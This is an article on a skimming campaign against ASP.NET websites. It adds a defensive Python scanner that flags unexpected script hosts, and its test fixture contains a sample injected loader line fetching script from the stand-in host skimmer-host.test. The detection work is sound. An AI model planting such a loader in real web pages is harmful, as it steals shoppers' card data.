
Credit Card Skimmer Going After ASP.NET Websites

A campaign spotted by computer security researchers in April was stealing credentials from e-commerce websites. Researchers identified the credit card skimming campaign as aimed at a specific target: ASP.NET websites running on Microsoft Internet Information Services (IIS) servers. The campaign had compromised at least a dozen sites, ranging from sports organizations to community and health associations and a credit union. The method used was malicious code injected into existing JavaScript libraries on the websites.

The campaign, exposed by Malwarebytes, appears to exploit an older version of ASP.NET, specifically version 4.0.30319, which is no longer officially supported because of multiple vulnerabilities. The skimming campaign began around April 2020, the first domain being hivnd[.]net (33.220.60[.]108), registered by a threat actor who uses a ProtonMail address.

In most cases the attackers inject the skimming code directly into the compromised JavaScript library, but in some cases it is loaded remotely; here, the skimmer was loaded from a remote domain, thxrq[.]com.
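Both delivery methods described above leave the same trace a defender can look for: a host that the site's own pages and libraries never legitimately contact. The following script is an added example, not code from the article or from Malwarebytes. It scans HTML or JavaScript text for `<script src>` references, embedded absolute URLs and dynamically created script elements, and flags any host that is not on a per-site allowlist. The allowlist, the sample page and the injected library tail are all constructed for this example; `skimmer-host.test` stands in for a remote loader domain.

```python
import re
from urllib.parse import urlparse

# Hosts this site is expected to load scripts from (constructed allowlist;
# a real deployment would generate it from the site's own asset manifest).
ALLOWED_HOSTS = {"www.example-shop.test", "cdn.example-shop.test"}

SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.I)
EMBEDDED_URL = re.compile(r'https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s"\'<>)]*)?')
# Pattern used by remote loaders: build a <script> element at runtime and
# point it at an external URL.
DYNAMIC_SCRIPT = re.compile(r'document\.createElement\(\s*["\']script["\']\s*\)', re.I)


def external_hosts(text: str) -> dict:
    """Map every host referenced in text to the ways it was referenced."""
    hosts = {}
    for m in SCRIPT_SRC.finditer(text):
        src = m.group(1)
        if src.startswith("//"):          # protocol-relative URL
            src = "https:" + src
        host = urlparse(src).hostname     # None for same-origin paths like /Scripts/x.js
        if host:
            hosts.setdefault(host, set()).add("script-src")
    for m in EMBEDDED_URL.finditer(text):
        host = urlparse(m.group(0)).hostname
        if host:
            hosts.setdefault(host, set()).add("embedded-url")
    return hosts


def unexpected_hosts(text: str, allowed=ALLOWED_HOSTS) -> list:
    """Hosts referenced by the page or library that are not on the allowlist."""
    return sorted(h for h in external_hosts(text) if h not in allowed)


def dynamic_loaders(text: str, window: int = 300) -> list:
    """Hosts that appear shortly after a runtime-created <script> element."""
    found = set()
    for m in DYNAMIC_SCRIPT.finditer(text):
        for u in EMBEDDED_URL.finditer(text, m.end(), m.end() + window):
            host = urlparse(u.group(0)).hostname
            if host:
                found.add(host)
    return sorted(found)


# Constructed sample inputs.
SAMPLE_PAGE = """<html><head>
<script src="/Scripts/jquery-1.12.4.min.js"></script>
<script src="https://cdn.example-shop.test/bundle.js"></script>
</head><body><form action="/checkout">...</form></body></html>"""

SAMPLE_INJECTED_LIB = """/* jQuery v1.12.4 ... original library code ... */
(function(){var s=document.createElement('script');
s.src='https://skimmer-host.test/loader.js';document.head.appendChild(s);})();"""


if __name__ == "__main__":
    print("page:", unexpected_hosts(SAMPLE_PAGE))
    print("library:", unexpected_hosts(SAMPLE_INJECTED_LIB))
    print("dynamic loaders:", dynamic_loaders(SAMPLE_INJECTED_LIB))
```

Run it over every `.js` and `.aspx`/`.html` file in the web root, or over the rendered page as the browser sees it, since injection into a served library is what this campaign did; a non-empty result from `unexpected_hosts` or `dynamic_loaders` on a library you ship yourself is worth an immediate look at that file's history.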

What are Credit Card Skimmers?

Credit card skimmers are malicious code, used by threat actors, that reads and records card details during otherwise legitimate transactions. The attackers behind these campaigns usually sell the harvested details on dark web forums to make more money from the intrusions. Point-of-sale transactions, such as self-checkout terminals or gas station pumps, are among the main targets of these attacks, but any web commerce transaction that uses a credit card can be vulnerable.

Although ASP.NET is not as popular as PHP, it is still used by personal blogs and small businesses, and many websites use it for shopping cart functionality. Those shopping portals are what the campaign targets, which shows that any website can fall victim to attackers; in some cases, sites get hacked and injected without being the intended targets.

In most of these attacks, the threat actors used several different routes to look for credit card data and passwords. Some of that functionality was poorly implemented, which made it harder for researchers to pinpoint during analysis. Once the researchers identified the campaign and the affected sites, they contacted the victims in the hope that they would recognize the breach and take action to harden their security.

Recent information on the attacks on the .NET sites showed that a known vulnerability in Telerik UI for ASP.NET (CVE-2017-9248) was being exploited. The attackers would upload .aspx web shells for remote code execution. Telerik's advisory page offers guidance and patches that site owners can apply, but they should also keep their version of ASP.NET up to date.
